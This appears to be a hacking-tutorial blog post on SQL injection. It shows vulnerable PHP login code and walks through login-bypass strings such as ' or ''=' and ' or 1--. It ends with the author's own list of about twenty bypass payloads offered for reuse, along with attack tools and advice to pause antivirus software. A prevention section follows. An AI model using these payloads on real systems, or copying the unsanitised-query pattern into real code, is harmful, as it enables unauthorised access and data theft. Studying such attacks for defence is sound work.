Data is one of the most vital components of information systems. Database powered web applications are used by the organization to get data from customers. SQL is the acronym for Structured Query Language. It is used to retrieve and manipulate data in the database.
What is a SQL Injection?
SQL Injection is an attack that poisons dynamic SQL statements to comment out certain parts of the statement or appending a condition that will always be true. It takes advantage of the design flaws in poorly designed web applications to exploit SQL statements to execute malicious SQL code.
How SQL Injection Works
The types of attacks that can be performed using SQL injection vary depending on the type of database engine. The attack works on dynamic SQL statements. A dynamic statement is a statement that is generated at run time using parameters password from a web form or URI query string.
Let’s consider a simple web application with a login form. The code for the HTML form is shown below.
<form action=‘index.php’ method="post"> <input type="email" name="email" required="required"/> <input type="password" name="password"/> <input type="checkbox" name="remember_me" value="Remember me"/> <input type="submit" value="Submit"/> </form>
The above form accepts the email address, and password then submits them to a PHP file named index.php.It has an option of storing the login session in a cookie. We have deduced this from the remember_me checkbox. It uses the post method to submit data. This means the values are not displayed in the URL.
Let’s suppose the statement at the backend for checking user ID is as follows
SELECT * FROM users WHERE email = $_POST['email'] AND password = md5($_POST['password']);
The above statement uses the values of the $_POST array directly without sanitizing them.The password is encrypted using MD5 algorithm.
First let us see an example of piece of code that actually creates the Login Page vulnerable to this attack.
$query="select username,pass from users where username='$uname' and password='$passwrd' limit 0,1";
$rows = mysql_fetch_array($result);
echo "You have Logged in successfully" ;
Echo "Better Luck Next time";
What we can see above is a PHP code which takes the user Input put the into the SQL Query and then check if any row is returned it allow you to get Log in.
Now as we can see the query is quoting the input with single quote, that means we have to use a single quote to close the first quote and then inject.
So lets Inject ' or ''=' into the Query:
Logging in with following details:
Username : ' or ''='
Password : ' or ''='
select username,pass from users where username='' or ''='' and password='' or ''='' limit 0,1;
so what i actually did is made the query to return true using the or. We can even try and comment out the query using any comment operator like using the following username and password.
Username : ' or 1--
what we did is we left the password field empty and commented out the rest of the query. so lets try and check the Query part.
select username,pass from users where username='' or true--' and password='' or ''='' limit 0,1;
Here anything after -- wont be executed which makes the query to be:
select username,pass from users where username='' or true;
and it will return all the rows. and we can bypass the Login. This was the basic okay let us assume now different queries and different injection for them.
select username,pass from users where username=('$username') and password=('$passwrd') limit 0,1;
') or true--
') or ('')=('
') or 1--
') or ('x')=('
select username,pass from users where username="$username" and password="$passwrd" limit 0,1;
" or true--
" or ""="
" or 1--
" or "x"="
select username,pass from users where username=("$username") and password=("$passwrd") limit 0,1;
") or true--
") or ("")=("
") or 1--
") or ("x")=("
select username,pass from users where username=(('$username')) and password=(('$passwrd')) limit 0,1;
')) or true--
')) or ((''))=(('
')) or 1--
')) or (('x'))=(('
Well that was kind of enough for the Explaination now time to finish so i will give you my own bypass list which i made.
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
The list was getting long so i had to remove payloads with different comments...you can now make them yourself. just add different Comments types with all these payloads.
Other SQL Injection attack types
SQL Injections can do more harm than just by passing the login algorithms. Some of the attacks include
Executing commands on the server that can download and install malicious programs such as Trojans
Exporting valuable data such as credit card details, email, and passwords to the attacker’s remote server
Getting user login details etc
The above list is not exhaustive; it just gives you an idea of what SQL Injection
Automation Tools for SQL Injection
In the above example, we used manual attack techniques based on our vast knowledge of SQL. There are automated tools that can help you perform the attacks more efficiently and within the shortest possible time. These tools include
SQLSmack - http://www.securiteam.com/tools/5GP081P75C.html
SQLPing 2 - http://www.sqlsecurity.com/downloads/sqlping2.zip?attredirects=0&d=1
SQLMap - http://sqlmap.org/
How to Prevent against SQL Injection Attacks
An organization can adopt the following policy to protect itself against SQL Injection attacks.
User input should never be trusted - It must always be sanitized before it is used in dynamic SQL statements.
Stored procedures – these can encapsulate the SQL statements and treat all input as parameters.
Prepared statements –prepared statements to work by creating the SQL statement first then treating all submitted user data as parameters. This has no effect on the syntax of the SQL statement.
Regular expressions –these can be used to detect potential harmful code and remove it before executing the SQL statements.
Database connection user access rights –only necessary access rights should be given to accounts used to connect to the database. This can help reduce what the SQL statements can perform on the server.
Error messages –these should not reveal sensitive information and where exactly an error occurred. Simple custom error messages such as “Sorry, we are experiencing technical errors. The technical team has been contacted. Please try again later” can be used instead of display the SQL statements that caused the error.
Hacking Activity: Use Havij for SQL Injection
In this practical scenario, we are going to use Havij Advanced SQL Injection program to scan a website for vulnerabilities.
Note: your anti-virus program may flag it due to its nature. You should add it to the exclusions list or pause your anti-virus software.
An Ethical hacker should know the penalties of unauthorized hacking into a system. Read more at: Legality and Ethics
For more tricks and update over hacking stay tuned to our site: Note 4 Tech